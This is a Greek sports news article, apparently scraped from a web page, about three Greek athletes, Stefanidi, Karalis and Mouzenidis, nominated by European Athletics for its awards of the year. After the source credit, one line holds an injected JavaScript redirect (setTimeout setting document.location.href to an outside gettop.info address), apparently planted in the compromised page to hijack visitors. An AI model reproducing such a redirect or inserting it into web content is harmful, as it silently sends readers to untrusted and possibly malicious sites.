Τρεις Έλληνες αθλητές υποψήφιοι στους κορυφαίους της χρονιάς

0
7

Τρεις Έλληνες αθλητές έχουν ανακοινωθεί από την Ευρωπαϊκή Ομοσπονδία Στίβου πως είναι υποψήφιοι για τον τίτλο των κορυφαίων της χρονιάς που πέρασε.

Η Κατερίνα Στεφανίδη έχοντας κατακτήσει δύο χρυσά μετάλλια σε Ολυμπιακούς Αγώνες και Ευρωπαϊκό Πρωτάθλημα και ένα χάλκινο στο Παγκόσμιο κλειστού στο επί κοντώ δεν θα μπορούσε να λείπει από τη λίστα με τις κορυφαίες αθλήτριες της Ευρώπης. Στην ίδια κατηγορία υποψήφιες είναι ακόμη οι Μπεϊτία (Ισπανία/ύψος), Πέρκοβιτς (Κροατία/δισκοβολία), Βλόνταρτσικ (Πολωνία/σφυροβολία), Τιάμ (Βέλγιο/έπταθλο), Κόλακ (Κροατία/ακοντισμός), Σίπερς (Ολλανδία/100μ.-200μ.), Σπάνοβιτς (Σερβία/μήκος), Πέτερσεν (Δανία/400μ.εμπ.) και Μάρτον (Ουγγαρία/σφαιροβολία).

stefanidi

Καραλής και Μουζενίδης

Στην κατηγορία του «Ανερχόμενου αθλητή» υπάρχουν δύο Ελληνες αθλητές ο Εμμανουήλ Καραλής και ο Οδυσσέας Μουζενίδης. Ο Καραλής βελτίωσε στη διάρκεια της χρονιάς τρεις φορές την κορυφαία επίδοση όλων των εποχών παγκοσμίως στο επί κοντώ Παίδων, ενώ κατέκτησε το χρυσό μετάλλιο στο Ευρωπαϊκό Πρωτάθλημα Παίδων.

karalis

Στην ίδια κατηγορία είναι υποψήφιος και ο σφαιροβόλος Μουζενίδης με χρυσό μετάλλιο στο Ευρωπαϊκό Πρωτάθλημα και πανελλήνια ρεκόρ τόσο στην κατηγορία του όσο και στην κατηγορία των Εφήβων. Οι φίλοι του στίβου μπορούν να ψηφίσουν τους αθλητές μας στο social media της Ευρωπαϊκής ομοσπονδίας..

mouzenidis

Πηγή: sdna.gr setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here